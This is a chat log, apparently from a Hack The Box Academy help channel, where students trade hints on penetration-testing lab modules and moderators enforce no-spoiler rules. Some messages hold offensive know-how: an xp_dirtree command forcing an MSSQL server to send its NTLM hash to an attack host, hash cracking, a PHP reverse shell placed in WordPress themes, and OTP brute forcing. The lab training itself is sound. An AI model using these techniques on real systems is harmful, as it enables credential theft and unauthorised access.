#modules
What? Am I wrong?
yes but that's different from subdomain
not entirely
and i already do the ssh -D
bud, read the WHOLE section
Wait guys am I wrong?
it's impossible to differentiate a subdomain from a vhost by glancing at it; while they are used interchangeably colloquially, they are different things
a single host can have the subdomains in different directories on the same host; thus a single-IP, name-based vhost
i already do but still can't figure it out
you don't go straight from the first machine to the last machine
there's a machine in the middle, this is the pivoting module yeah? where it describes using socks over rdp?
unless i'm reading wrong, bc you didn't provide the section name
gotcha, I chatgpted it as well for some extra context
(this is why it's important to provide the section name alongside the module, to prevent confusion from those that are attempting to help you)
oh my bad, i'm in ICMP Tunneling with SOCKS. i try to connect with RDP but it can't connect. is the machine in the middle the IP that the module gives us? like 10.129.
because ptunnel-ng doesn't run, so i try to use other tools. but it still didn't run as well
10.129 is the first machine
do me a favor when you connect to the first target: check the ip info
I am getting an SSL error when trying to browse into the hidden admin page? @fathom pendant
172.16.5.129
ah i was thinking you were on the next section which is a common section for people to get messed up on
http://sub.domain:port/page
not https
Oh my god that's what happens when you stay up until 5:44 am
ssl error when I'm trying to use http ... that's actually embarrassing
make sure you comment out the other socks config line
that tends to mess with it a fair bit
as you can see your proxychains is trying to use 127.0.0.1:1080 and because it's in strict mode, it's failing and not trying 9050
no; ignore what i said about middle machine
i was thinking you were on the next section
owh okay2
Appreciate the help 🙏 @fathom pendant
just got done with the module
so i need to nano and change the socks5 into 9050 right?
match the config that's given by the module, yes
and comment out the socks4 line
okay already
this is why i don't mess with proxychains stuff, too much headache
yap, before, when i was still in some module, i could read so much documentation to learn about it. but when it comes to pivoting, port forwarding, and tunneling, my head feels like it's blowing up
it's like a totally new field again for me, but it feels challenging
Anyone around to explain the question at the end of the Introduction to Malware Analysis - Debugging module (/module/227/section/2496)? I am unable to find the process for the notepad as it does not pop up on the list. Thanks in advance.
i still can't do the rdp and ssh -D 9050 into the server. is there anything that i'm doing wrong? @fathom pendant
T_T
i'm assuming you also did the ptunnel-ng steps
but thanks for the help marcielee
owhh icic
sometimes it's weird like that
The sanitizers section of intro to binary fuzzing was fun. I wish it would have gone over other sanitizers with examples as well rather than just address sanitizer though
Hey, I'm on the Hacking WordPress module.
At the Directory Indexing section.
I received a simple WordPress website, and was asked to manually enumerate the target for any directories whose contents can be listed, and locate a flag with the file name flag.txt.
Problem is I crawled every file in /wp-content/uploads/ and /wp-includes/ and the /wp-content/plugins/photo-gallery (a plugin that I found)
/wp-config.php returns a blank page
I can't find flag.txt.
Enumerate some more 🙂
What am I missing? I went over all of the files mentioned in the WordPress Structure section.
There’s more plugins
Good luck 🤞
Got it, thank you @storm elk
You’re welcome. Have fun with the rest of the module 😎
Hey guys got a question about the footprinting module the DNS section
This is the question to the challenge
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I have found the domain for 203, but when I try to query for the SOA, it returns nothing to me
I tried to query any and it only gives me the A DNS records
What command did you use to query?
Wait I got the screenshot but can't send picture
Do I need to verify first to send pic?
Identified, I blurred the domain name just in case for spoilers
did you try to dig specifically for soa?
You mean dig SOA @$IP [domain_name]?
yes
Damn @foggy tusk your pfp making me hungry
lmao
Yeh, done it, it returns nothing as well, I'll send a pic
Haha, I saw it and took a picture of it in a public place. The foods are fake btw. Hopefully no one doxes me from a picture of chicken lol
Why are you trying to get the SOA?
Which group can connect to LINUX01? how can i find this? i can't think of anything. module = password attacks, section = pass the ticket with linux
Because in my mind I thought it was asking me the DNS server for the said domain name
I just tried submitting the domain name and it is a correct answer, idk why
See that's in your mind
Yeah I just read the question again and I was like what is he talking about SOA for lol
So FQDN means the domain name itself?
Fully qualified domain name
I really need to reread the theory
Well I didn't do the module I just googled it
Okay, thank you for the answer I'll do more research again
of course
https://superuser.com/questions/1021869/using-sub-subdomains-with-bind
This might be interesting to read. Apparently there is only one SOA per zone, so that would imply that all the subdomains are managed by the same zone which challenged my understanding of dns
Can you put multiple levels of sub-domains in the main zone with bind?
I have one zone called example.com and I want to create a sub-domain like host01.nyc.us.example.com. Can I make an entry lik...
Thanks for the recommendation
I'm reading about it and trying my best to process the info rn, I have become the loading cat
has anyone noticed in the module = password attacks, section = pass the ticket with linux that the ccache of julio is changing
only one of the ccache is valid
yeah i figured it out
but is there a script running to keep the ccache valid from time to time
no; there's a script running that should generate a valid one
yeah same thing
no
but the date of creation of those files are same
you said from time to time
ok i am wrong, you win
since the targets aren't on 24/7; there isn't one
both ccache are generated at target spawn, but only one is actually valid
yeah
one is generated from a script that spawns one with a certain set of info, one that is generated from actually querying the DC
let me find that script i am root btw
I've come to share knowledge (no one asked for it, but in case someone is curious and sees my question in the future), it is possibly because
"the 'outer' shell you are implicitly using to call your shell script using shell_exec() is probably not Bash in your case. This way, brace expansion never takes place because there is no shell capable of expanding the expression before calling your program (as it would be in an interactive Bash session)."
That's why i wasn't able to recreate the bash shell even in a similar deb env.
you don't need to find the script
i wouldn't concern yourself too much with trying to figure it out
i am not hoping to ..
yeah
(screenshots from the target about specific environment bits is spoiling)
don't be weird
gr8 i know you know more
careful in the future with sharing screenshots, one of your screenshots didn't have the fqdn redacted in it
i'm pointing out that the module is tier 1; and the rules of this channel specifically say don't spoil above tier 0
don't spoil modules above tier 0; command injections is tier 2
ok it will not happen again
ah okay, sorry about that. Was it the actual command itself or information in the module itself that was the issue? We can discuss via DM if need be. I wasn't trying to specifically share answers
alright noted
a bit of both; you mentioned the section specifically and provided a working solution.
ohhh I didn't see the channel title "but do not spoil module content over Tier 0" , is there a place to discuss Tier 2 or higher module content?
generally speaking, outright giving/providing a solution is spoiling as someone can just copy what you did without actually putting in the work themselves
no; as modules above tier 0 are paid content
the only light exception is #1234357888114364508 to post about issues
you can ask for help and hints to nudge forward
but you can't share direct solutions or commands
it's why i do my best with my nudges to be general enough, but make sense in the context of doing the material
if a conversation about how to move forward with a t1+ module you're stuck on needs to happen, it can be taken to dms so as to 1: not flood and 2: not spoil since in DMs things can be a bit more direct
sounds good! I was just curious on why the command works in the module env and not in a normal deb env moreso and wanted to share exceptions in env! otherwise noted on everything mentioned, I'll try not to spoil in the future 👍🏾
if anyone is curious as to nudging instead of direct answering:
Nudging encourages the person asking the question to apply critical thinking; if i were to just tell you to do x instead of well what about <hint that makes 0 sense out of context> for instance with one of the modules one of the hints is 🤖 to encourage the person asking to consider one of the most common files on a web server: robots.txt
or sometimes engaging in the 'why' method, asking 'why' someone is doing something has them think and rationalize that either "i'm overcomplicating" or "i'm doing something wrong"
happens a lot where you're trying to overthink the problem; your first focus in any of the modules should be to follow the instructions (changing a thing here or there to get the flag) and then tinkering around with other potential methods
hi
Hello
When it comes to the Target(s) in the modules if the time runs out and I refresh the target, will any of the previous actions that I did to the previous target stay or be affected?
Like let's say I was using intruder to fuzz for something and the targets life limit expires.
you'd need to restart it
if it times out while using intruder (assuming you used intruder near the start of its lifetime) you're doing something wrong
Gotcha, thanks for the answer
I’m neweeeew
In the CAPE training, Kerberos Attacks module, under Kerberoasting from Linux, when I run GetUserSPNs.py, I get an error - [-] [Errno 2] No such file or directory: 'DC01$.ccache'
Has anybody ever experienced this?
are there modules in the academy that can prepare me for HTB challenges?
It has many things like Crypto, Reverse, etc. but I'm not well taught in this stuff.
there's some binex stuff and some game reversing but as far as crypto there's nothing (at this moment) regarding that
can you recommend some resources that I can learn Crypto from?
google ¯\_(ツ)_/¯
I am inputting the command exactly per the coursework.
Need some help? Learn how to reach the support team on Academy.
i guess
otherwise i suggest resetting the target, changing vpn region, praying ¯\_(ツ)_/¯
nevermind.... I still had KRB5CCNAME environment variable set from attacking a different box in the lab.
Yet, another forehead slapper...
May I know, is it because of the location that the network is so slow? cause I am stuck at the first pwnbox section
page 4
that's not the section name
section name may be something like "interacting with targets"
you don't need to paste the command either
you can just type the command in
but if you're having issues pasting, there's a clipboard on the bottom right (if you fullscreen)
the section name is 'section', it is part of the intro to academy
ya that's exactly what I am doing now
otherwise you can just type in the pwnbox terminal cat /etc/issue
if you link your htb account via #welcome instructions you can paste screenshots
alright
if you're experiencing delays when typing in; you can change the pwnbox region, but i don't recommend that if you're a free user as you only get one spawn per day
Hello, confused in the ffuf skills assessment: Question 3
replace the given port with the word PORT
i'm assuming you already fuzzed and found what they asked for
Yes i found the /admin dir but there is the login page: tried many things but there is no api key
then you are not in the skills assessment of the FFUF module
Hiii every one
Where can i find hint about Alert(Machine) Easy
Thks
yeah that's a different assessment
send the link to the module
yeah that's information gathering: web edition
not the ffuf module (attacking web applications with ffuf)
in this case: robots are your friend, don't forget to put the discovered subdomain(s) in your hosts file
hi
wait, you're starting with the cape course from zero without cpts or other cert?
you don't need to have CPTS to start CAPE
if the ccache is updated does the old one expire
i know KVNO but i dont have info about KVNO of a keytab
may i know which module teaches about mimikatz? thanks
there's a few that utilize mimikatz but none that strictly teach it
ok, can you point out which modules touch on mimikatz? thanks
AD Enumeration and attacks, I think Password attacks for one of the things uh not sure, don't have my notes or anything off the top of my head
i know the t3+ AD modules utilize mimikatz a fair bit
ok no problem, thanks for pointing it out, hard to search on the hackthebox site, this is really helpful enough
thanks
unless it's a module or section title the higher tier and/or newer modules that mention mimikatz take precedence
well if you google and find any writeups that are for t1+ modules then those break ToS
ok thanks for the pointers
but tbh if you do the pentester path you're gonna run into mimikatz a bit
¯\_(ツ)_/¯
if they do make a mimikatz dedicated module it'd likely be t2 at least
maybe t1
ya that is what i'm having a headache about, there are some tools I have to know
the modules teach you the info you need regarding mimikatz and what they want you to do
if you really wanna learn mimikatz just RTFM
i will be subscribing up to t3 cause some t1 and t2 don't have what I want to know, not that i am very good, it is just that i need to cherry pick
mimikatz is just one of the must-know tools I bump into understanding issues with while attacking AD
ok thanks
cause when i use mimikatz to do part of the AD attack or enumeration i get the results, but it seems like i don't get certain parts of it, as in i don't quite understand how i get the result
can't help ya there ¯\_(ツ)_/¯
no problem, i'm just sharing with you, this one i have to read up on my own
generally the type::tool is self explanatory
mimikatz has 5 attack techniques, i'm trying to see what it does
I recommend Password Attacks module, Windows Local Password Attacks section. It goes pretty in depth to dumping SAM, LSASS, NTDS, etc.
i’m brand new to cybersecurity and need help on htb. is there a step by step guide? i’m on a student account, do i need to up my account to get step by step guidance or is there anything like that on hack the box
ok sounds good, will definitely head over to have a look
Just start with the Tab= Starting point
Gives you
A guided mode
ok thank you
And also you can go with Academy htb also
starting point isn't recommended if someone doesn't know jack shit about linux
That's true tho…
but they're referring specifically to being new on academy, referring to the student plan
I answered earlier but someone deleted it
hello
yea i’m on academy and i need step by step guidance. but can’t seem to locate it on there
for academy only the annual plans have step-by-step guides but you shouldn't find videos of modules above tier 0 as those are against ToS
watching someone else do something only goes so far; the benefit of academy is you being able to do it yourself
you can read and perform actions
I can't connect to RDP, does anyone know how to fix it?
i suggest the information security fundamentals course to get your bearings
thank you
but as far as that, no videos exist for academy content (aside from tier 0)
found it, looks relevant to me and useful thanks
The screen will go black, and then it will exit
the annual plan guides aren't really great for learning from either as they don't necessarily teach you anything
when the screen is black press enter
you don't need to blur the IP btw, no one can connect to the 10.129.x.x machines aside from you
Okay, thank you, but I still can't connect
aside from that i'd say tinker with different vpn regions or the classic just turn it off and turn it back on
ok I'll give it a try
can try the nearest location i know this is obvious in case you might miss this..
when you change vpn regions you'll need to respawn the pwnbox
and the other obvious don't run the vpn on your host machine while using pwnbox
just give it a few minutes
I am trying
as the AD enum labs are networked machines
you didn't blur the answer in that image
btw
ok Sufficient patience is required for debugging, thank you
time to get coffee
also i always suggest adding the /dynamic-resolution option to xfreerdp, so that you can resize the window
ok this is really cool
i dont have permission to send there either
Password Attacks - SA - Hard Lab
I managed to move the ||Backup.vhd|| file to a directory accessible by ||Johanna||, but mounting it requires Admin privileges. What am I missing here?
what do i do
brother read the channel
engage in critical thinking activities
Good morning all. I am trying to do the Knowledge Check for Getting Started Module. So far I was able to find credentials and get to the point where I need to add a php reverse shell to somewhere either in existing code or upload a new file.
Does anyone have a good article or piece of advice on where to place the rev shell in the code or if I am on the right track? Again, trying to do without a walk through, but I have been here for quite some time.
I have a listener setup, tun0, 9443, etc., but can't seem to curl and get anything to connect.
you don't need to mount it on the target
Sorry to interrupt the above convo.
there is no convo, don't apologize
this channel exists to help people with modules, you asking for help isn't interrupting anything
Got it.
also not much of a convo, more like a brick wall
i haven't touched this in a minute, this has ||themes|| enabled yeah?
Yes!
ty i got it
those use php 😉 and you don't need to bother with the <?php ?> syntax
just put the code into one of those, then go to the directory specified (it'll tell you where it updated iirc) and magic
Ohhhhhh... I had the bash one liner inside of it from previous.... I think I get it
What am I supposed to with it?
you can mount it somewhere else
i'll tell you this this is basically the last step
Got user! Thank you for the push I needed
I cannot grab a hash in CAPE - Kerberos module - Unconstrained User...
kbrelayx is receiving the hits and Printerbug seems to be working fine, but it's not writing hashes to the disk...
i cannot ping the dc with the config set up by chisel and proxychains. first it's very confusing and second i don't know how they both communicate with each other, proxychains and chisel. i am on module password attacks and section pass the ticket with linux, on the optional question "Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished."
when i use the command proxychains python3 wmiexec -k dc01
and the dns 4.2.2.2 ????
can you ping dc from the pivot host?
because windows by default blocks ICMP echo requests so this might be the issue.
if you can, then the issue is with your pivoting setup.
yes
Try running proxychains with sudo
I believe the module as well talks about how to add a domain to the search/configuration in resolv.conf
they tell about /etc/hosts
Also, I'm assuming you put the dc01 in your hosts file?
yeah but not about resolv.conf, i did add the entry of the ip of the domain in there but no luck
You need to put DC01.inlanefreight.htb AND DC01
in hosts?
yes
Well the entry point isn't running the dns server
I forget i feel like there's one more you gotta add to that hosts line
yeah i have the entry just like in the module
perhaps you mean inlanefreight.htb
nmap resolves the ip to the domain by default and it is doing that, so i think there is no problem in the /etc/hosts file
can you show your proxychains config file + your chisel setup?
since you have socks5 in your proxychains config file, I think you need --socks5 in the reverse chisel server command.
ok i will try
happy lunar new year ^^
thanks i think the issue is resolved but got another one
Use the fqdn
Also try with psexec
Different coding
@fathom pendant you have every answer
While they're similar in nature, they do functionally different things to achieve the shell
yeah agree
wmiexec uses windows management instrumentation, psexec uses process injection i believe
iirc psexec creates a service
welp, I know that psexec works with SMB, but what does wmiexec work on?
oh dur its right there in the screencap
They both utilize smb and ldap, just different method
are you sure?
yeah smb3
Look at the communication that occurs before failure
smb3 dialect
Nothing to do with smb version
Or at least that only plays a small portion
yeah
It communicates with 445 and 88, smb and ldap respectively at least iirc 88 is ldap
yeah i saw that 445
88 is Kerberos
guess I'll need to have a little bit more exposure with impacket utilities lol, not just use the tools that always work for me.
Since a lot of this is interplay
psexec doesn't need Kerb auth
Hey guys, can I help you? 😄
works just fine on a regular Windows host
but if domain joined obv it will query the DC
hell i dont get it
wmiexec uses the Win32_Process object in WMI for command execution (RPC over DCOM) and puts the output in a file. then it uses SMB to read the output. in recent versions of wmiexec.py you can use -nooutput to disable smb (so you don't have access to the output directly)
you can get a very high-level overview if you check the script on the impacket repo
The inner workings is more of an advanced understanding, i wouldn't worry about it
exactly, if you try to understand how windows works behind the scene, you'll have a headache that's never leaving lol.
You mean windows 11 
ok lets move on
even 10, just look at how windows authenticates users.
It's just tons of DLLs and stuff loading behind the scenes.
Consultants often upload and execute a binary payload to a remote system during penetration tests for the purpose of footprinting the target, gathering information, and leveraging that information to compromise additional hosts. When the scope of the engagement calls for the consultant to remain stealthy and undetected throughout the assessment,...
this is for smbexec, similar to wmiexec
this is interesting, thanks for sharing.
what is happening today
what's the difference between dc01 and dc01.inlanefreight.htb
why it reached to winrm afterwards
fqdn, basically
some services only accept either IP or fqdn, and when interacting with kerberos; fqdn is preferred
but looking back over your screenshot it's also about hostname
the hostname of the DC isn't DC01.inlanefreight.htb it's just DC01
and you're interacting with the domain of inlanefreight.htb
i wonder if you can just do -i DC01.inlanefreight.htb and not worry about -r
yeah u are right but i am confused about having the same ip over these two names
virtual host thing is on web
because you're not dealing with things over the web (fully)
you're dealing with silly kerberos things
vhosts and stuff like that are exclusive web terminology
Hey there! I'm really stuck on the module API Attacks in section Broken Authentication. I managed to get the account info but all options to reset the password need an OTP, and I can't manage to get rid of that OTP because they are sent to the saved user email and phone number... any enlightenment? I've been trying for two days but my practice time ends and I still have no idea about how to solve this...
at first i thought there was a problem in the krb5.conf file, then i entered the correct entry. but then i got frustrated over this question, i am moving on
Have you tried to brute force it?
yes, I used ffuf following the example in the lecture, but there are no OTP wordlists locally and when I try to download an external wordlist it seems the practice machine is not allowed to download anything; tried by curl, and directly on the website that hosts the wordlist, but it always responds with a connection error.
Try the seclists 4-digits-0000-9999.txt as a starting point for a wordlist.
I'll do that, thanks wish me luck 🙂
Np, if you are still stuck with it, you can DM.
Thank you, I really appreciate it
The name of the container is "Deleted Objects" not Tombstone
this should be corrected
tombstone is the state of the object
Hey guys, in the "Using Crackmapexec - MSSQL Enumeration and Attacks" we are told we can run commands on the server via the "-x" flag, during the exercise i noticed it doesn't work and wondered if i need to enable xp_cmdshell first, yet i didn't find any module/option to do so with nxc. After enabling xp_cmdshell with impacket's mssqlclient.py, running commands with nxc was working.
Is there a way to enable xp_cmdshell with nxc? because it seems the module forgets to mention that
don't share answers to modules, if you feel it needs correction please post in #1234357888114364508 with the module and section name
Hi. I'm working on the File Upload Attacks module, in the section Limited File Uploads. After trying to exploit the SVG file upload, it seems that I encountered an issue where the web app lost the upload button, and the SVG image shows as blank, as well as the source code. Is there something that I missed during the exploit?
i think there's a way to specify which execution mode to use under
reset the target
looks better now?
Oh, i reset it a couple of times before and after this, i finally get what I expected. Thanks 🙏🙏
doesnt seem like it
and no module to do either
¯\_(ツ)_/¯
can you not use smb to have it enable it?
er not smb
sql
idk, i figured the entire idea is to enable it through interaction with mssql
-q you can send a 'query' string
so maybe you can pass through the enable xp_cmdshell commands
just tried it again to make sure, didn't work for some reason, still it's weird nxc doesn't do it automatically if u use -x to run a local command, or at least have an option to enable it
holy shit https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities just found out about using nxc modules to scan for vulns
like printnightmare and shit
Yeah it will identify a few of them. I love that tool.
CAPE module help.
Anyone finished this part from RBCD from linux
Compromise the domain without creating a machine account. Use DONE as the answer when finished.
u just need to use DONE no?
I know that, but that doesn’t help me ensure I know how to do it, if it’s on the exam
my bad, thought u were asking for the flag lmao
it's optional as in it's an additional way to do things
you'll likely be able to create a machine account (if it comes to it)
🤞🤞
imo finish the module then go back and do the optional bits
MacOS Fundamentals, no targets, and my workstation (pwnbox) is still parrot.os
Nice, I’m taking my time because I’m building obsidian templates for each section. It’s nice with the templates it auto fills all your findings.
that module requires you to have a macOS device
See I had a feeling that was the case but I didnt look at the overview just at the intro etc. Thank you
You beat me to it, again
Marcie is 🔥
Thanks BOTH of you lol
question about HTF: do i have to remember everything i read, or will it all connect at the end? because i started the Pen test path
I'd say you'll want to have a solid understanding of the material taught, yes. You'll need strong foundational knowledge to understand how the underlying systems are really working and apply what you learned to new situations that you haven't seen before based on that fundamental understanding and knowledge.
You should take notes
context and repetition
ok
stuff will start connecting the more you practice
Yeah but until it clicks, it saves the time of loading webpages if you already have notes of what to try
the knowledge needs to be relevant and applied to the specific situation
Pretty sure you can do that whole section without a pwnbox just need to read.
Careful not to post spoilers for the module
I would recommend reading over the section again and make sure you're using the right commands
It really wasn’t a spoiler, since you can click done and what I was doing wasn’t working. It was also a direct copy paste from the module.
well yeah.. posting content from the module isn't allowed unless it's a tier 0 module
you can with spoiler tags though right?
no
This isn't me trying to argue, just ensuring that I understand correctly, but isn't the erratum section covered in screenshots of items not working correctly from modules? and for the past two years I have seen people that have trouble with syntax post screenshots or syntax snips from the modules of what did not work.
Anyone for a quick chat on the "Applications of AI in InfoSec" Module?
yeah erratum is an exception because you have to tell them what's wrong for them to fix it. the general rule of thumb is no posting content from anything above t0.. you can ask your question in such a way that doesn't reveal the contents of the module. that said, i did answer your question and tell you what you needed to do (you're not using the right command somewhere)
To answer your question, I use starship with zsh plugins. The terminal is windows terminal that I ssh into my kali box from, and I use ligolo from my windows machine to kali, so i can use tools like burp, firefox, rdp etc. to target machines on tun0. Just started with this workflow last week, so we will see how well it works.
Here is a shot of the terminal since my last post was in violation and should have been posted, for those that are curious. I am more than happy to share dot files or help people establish a solid or riced out shell. My starship was taken from typcrafts dotfiles, but my color scheme for everything is dracula
There is a tutorial on YouTube for these changes
Working on Web Attacks: Chaining IDOR Vulnerabilities and I am working in the following question:
Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page.
I changed the email but the flag isn't generating.
Thank u I use kali linux VM on virtual box
Thanks
you can still do it with only a linux vm
Yup I’m using VMware workstation for my Kali. I just SSH into it.
can anyone help me with “virtual hosts” in “information gathering-web edition” module
my gobuster is coming up empty every time
when i did the module it was using ffuf, did that change with the update of the module?
i’m using this command gobuster vhost -u http://94.237.59.180:40296 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -o vhosts.txt
yes , it’s gobuster now
looks to me the issue is related to your -u value, that should be a hostname not an ip address.
Can anyone assist me?
actually i could be wrong not sure i didn't do the updated module, but they give 2 commands one using the hostname instead
How do I start 🫡
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Guys, I need help, because I am really stuck here, and don't know why it isn't working at the last point. I did everything the same as what is shown in the modules, but it's still not working.
Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.
You need a --domain to append 😉
There's 3 total target systems for this section, if this is the double pivot with socks over rdp
yes this one, when I am trying to connect with rdp to 172.16.6.155, I changed the mode as well, it is showing that the server is not available and to check if it is running.
Can anyone help with Web Attacks: Chaining IDOR Vulnerabilities and I am working in the following question:
Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page.
I changed the email but the flag isn't generating under the admin edit profile page.
Like I said 3 total machines, the 10.129.x.x target, the middle machine, 172.16.6.155
I am already in the middle machine and trying to enter 172.16.6.155 with tunnelling, but it is showing me an error, like can't connect to remote computer, and showing 3 reasons. If there is any way to send a screenshot, I want to show you. Can you help me figure it out?
Make sure everything you do looks like what's done in the examples, same messages and all
If you wanna send images here read and follow #welcome
thank you 🥹
Is there a module speaking about CGI?
It's touched on in a couple modules but nothing in depth beyond "hey cgi bins can be vulnerable, try this"
I just want to learn about what CGI's are, and can't find good articles
If possible, can someone help me understand why I get varied results using SMTP-user-enum? I have the answer because I used Metasploit, but I want to understand where I went wrong. (This is for the Pentest job role, Footprinting, SMTP.) The question wants me to find the username. With the default query timeout I don't get any responses; when I increase it to 6, I get 6 usernames that exist, but when I check these with VRFY none of them exist. If I increase the query timeout to 7 I get a lot more results; the correct answer is in there, but finding it would mean taking most of the provided wordlist and using the VRFY command on each, which kinda defeats the object of using the tool
thanks in advance
the more time you give it, the more the server can screw with you and provide you with false positives
VRFY can be unreliable, so you might have to use another technique to confirm these usernames
For the Attacking Common Services module in the FTP section, is it normal that I get disconnected from the ftp port, that it closes? I managed to get the files with the anonymous user but now I can't even reconnect to it?? Dunno if it's a bug or the way it's intended, can't even bruteforce the user and pass with hydra or netexec or medusa as I keep getting dc'd? Dunno if I'm doing something wrong or it's the intended way??
If that happens reset the target and wait a few minutes, and if the issue still persists then nothing much to do.
I tried that a couple of times xD I'll wait an hour or so before trying again then, thanks for the tips
Thanks, I also tried the RCPT but had the same problem, the default setting I believe is 5 which returns no exists and then 6 gives false positives
I’ll have to do a bit of research on this tool
yes, please do a bit of research
Really nice Module! The Introduction one was heavy on theory, but this one was really nice!
This module is a practical introduction to building AI models that can be applied to various infosec domains. It covers setting up a controlled AI environment using Miniconda for package management and JupyterLab for interactive experimentation. Students will learn to handle datasets, preprocess and transform data, and implement structured workf...
All you need to know about the VPN Connection for Academy
thankS!
Guys I have a question in the Skills Assment File Upload, when I got using burpsuite to intercept the request and see how the image was being sent, after fuzzing and knowing what extensions are allowed and so on, when I sent it to the intruder the image was uploaded but if I sent it manually from the Repeater, it kept telling me “Only images are allowed” but from the Intruder the image was uploaded, can anyone know why this is happening? Or is it a machine error?
sounds like there's some filter in place or you changed something which made it think it's not an image. try bypassing the filter.
It is strange because the only thing I did was to send it from the repeater to the intruder and then fuzz the extensions, so the request was the same, nothing had changed
There is no "better." Infosec is as wide as it is deep, pick the niche you want to learn and go for that one.
yeah, cbbh
Linking on the website doesn't actually do anything (yet)
gotcha. odd but thanks
more odd that I can't message there and had to here since it's a bit off topic. Should have someone fix that lol
Is this the first time doing that skills assessment?

tbf I did and it mentioned limited access to the server but why not the one channel to chat in the server about the site itself lmao. can't chat to ask questions if you don't have an account...
When you /verify it provides more access to the server
And yeah, it's an official server relating to a product/service, of course you need an account
But it's not like you need to pay for the account
Yes but that also requires an account. can't even come to ask questions about the service you might be interested in. Doesn't make much sense so.
#welcome explains a lot, alongside visiting the website itself
Generally you can email about stuff like that. Most companies don't really provide 24/7 support via their discord.
no but community members could
and they do here
Hi
anyways I don't want to just be ranting when I was just trying to inquire so I'll be on my way then since it's not welcomed.
You should be able to pose your question there
I have a small question regarding php
Since you're so adamant about not creating an account (which is 100% free to create)
```php
<?php
echo gethostname(); // may output e.g.: sandie
?>
```
this command does get/execute the system hostname, right?
gethostname() seems like a built in php function
Since it's not doing system (command)
ah I see, I needed to execute hostname on one of the File Upload Attacks module targets and it said to execute hostname. I searched how to get the hostname from php on google and this was one of the top results
when I uploaded this file it gave some error
That's just one way to do it
More than one way to perform desired actions
ahh if it's a way, is there a reason it doesn't work? I'm tryna try and experiment with different ways to help with understanding and familiarity
So I just did the Footprinting Lab - Medium and I have a question, trying to understand some things. Anyone up for a chat ?
yup thats literally where i got the above code from
Anyone else having issues with the Attacking Common Services - FTP/SMB machine?? Ports for the service work and after a few minutes they're not working anymore. I restarted the machine a few times and sometimes it works 1 time, sometimes 2 times, but most of the time it doesn't even work on machine spawn
not sure but as i said there may be other ways to get your desired result
okay appreciate it
could be a config that disallows that function
ahh I see, weird lol
not that weird
it did say it wasn't validating the file uploads 🤔
i mean in the example it allowed us to upload a file that executed "hello world" from php 😅 and I think it said it didn't have sanitization
Sure
doesn't mean there can't be stuff that prevents execution
also did you try without the echo?
nah didn't try without the echo, otherwise it wouldn't display it on the web page? 🤔
ok seem there was apparently an error with what I was doing or the website, well I refreshed the target and it worked now 🙂
As I was very weak in this part I decided to review it to understand well all the contents of file upload and the truth is that I don't remember the first time I did it, but it is the first time that this topic happens to me.
If you are still working on it I don't mind checking out your requests and responses.
Sure, give me a moment and I'll go back to the skills assessment and send it to you
Someone can give me tips for the Attacking commons service SQL part?
I connected to the mssql server using impacket-mssqlclient
afterward I run responder on my attack host
execute this command on the mssql server: `EXEC master..xp_dirtree '\\10.10.17.28\share\'`
Receive an NTLM hash on the attack host
But tried to crack it with the resource wordlist and the one found on the ftp/smb server but no hits
am I missing something?
no it cant crack it
If you couldn't crack it, and you're sure you provided the correct hashcat mode, then make sure that you copied the whole hash, and that the hash in the file is written on one line without line breaks.
Did you use 5600?
oh right
that might be it
Right I think that's it -> 5600 NetNTLMv2
It worked thanks
How do you guys know what hash type to use? Is there a way to detect it, or a program to autodetect a hash?
I usually run hashcat --identify file.txt on the file, this sometimes gives direct answer, and other times it gives possible modes, if so i usually try what seems right to me or try them all lol.
Very nice, thanks, I'll add this to my notes
I need to reach an admin please?
Web Attacks Skills Assessment I am stuck on changing the admin password. I've tried using ||uid + token + new password on reset.php|| but to no avail. Any guidance?
Can anyone provide assistance?
Try with || verb tampering ||
I am in the HTB academy path and in the Working with Files and Directories module. Why do I keep getting command not found when the command ls does work and when I pull up the manual page, it shows the flags I can use
I am trying to get the inode for it
-i is the command for inode but it isn't working
is the flag for ls
I didn't misspell it
that's what I did, shadow.bak
without the pipe?
ohhhhhh, ok

I will try that
You're right, I did it without the pipe and it worked
And you are right, shadow.bak is not a command, lol
I should have been using grep shadow.bak if I was going to use the pipe
all the little stuff to remember, it can be exhausting at times lol
True. I am in the learning phase for the basics. I am still very new to this.
this
I am going to try that right now
how do I exit out of this
exit worked
I think it might have been but I am not sure
I just tried what you suggested and it didn't work
but this worked, I get what you mean now
LOL, oh man! The little things are going to kill me
At least I am a little older and wiser so I won't want to throw my computer out the door, 🤣
When I get frustrated that is
Well I can't afford a new one every week, 🤣
I have calmed down as I've gotten older, thank God. I can just walk away from the computer now and get a little exercise to calm down.
hihi i was wondering how you resolved this :X thank you... or if anybody would know, for citrix breakout, how does one switch from the citrix environment back to the local desktop?
then take notes on the little things 😉
Maybe the default method you are using is filtered so you should try another method in the HTTP request.
1; don't spoil assessments
2; read the evasion section again, there's something important in there relating to connecting 😉
sorry, and thanks for the answer🙂
@fathom pendant Lol, will do!
biggest thing to unstick yourself in the future is taking notes on stuff that get you stuck in the moment and how you resolve it
Yes, great idea! I need to write some notes down tomorrow because I actually reinstalled my parrotOS and found a video on YouTube that showed how to dismount and when to dismount the iso. So I got it working good now.
I just have to get into the habit of doing it right away ALL the time.
I have a question on the Windows Security section from Windows Fundamentals, particularly the "What 3rd party security application is disabled at startup for the current user?" question. ||I can't figure out where exactly NordVPN gets disabled, seeing as it is in the current user's Run key and therefore should be running. Is there something in Windows that can override what's set in the Run key?||
the user could very well have just went in and disabled it themselves at startup
¯\_(ツ)_/¯
as you can see one-drive is also disabled AND in the runkey
Right, I guess I was just expecting it to be disabled by default somewhere
Yeah, that's true
Alright, thank you
Hello everybody ! In section https://academy.hackthebox.com/module/158/section/1427, I would like to practice the technique presented as advised in the conclusion. The problem is that we are supposed to have RDP access to the target, but no credentials are given. How to get around this problem ?
you don't need to practice rdp or anything; plenty of the other sections deal with that
this section is part of laying the groundwork for understanding the tools
Ok, thanks
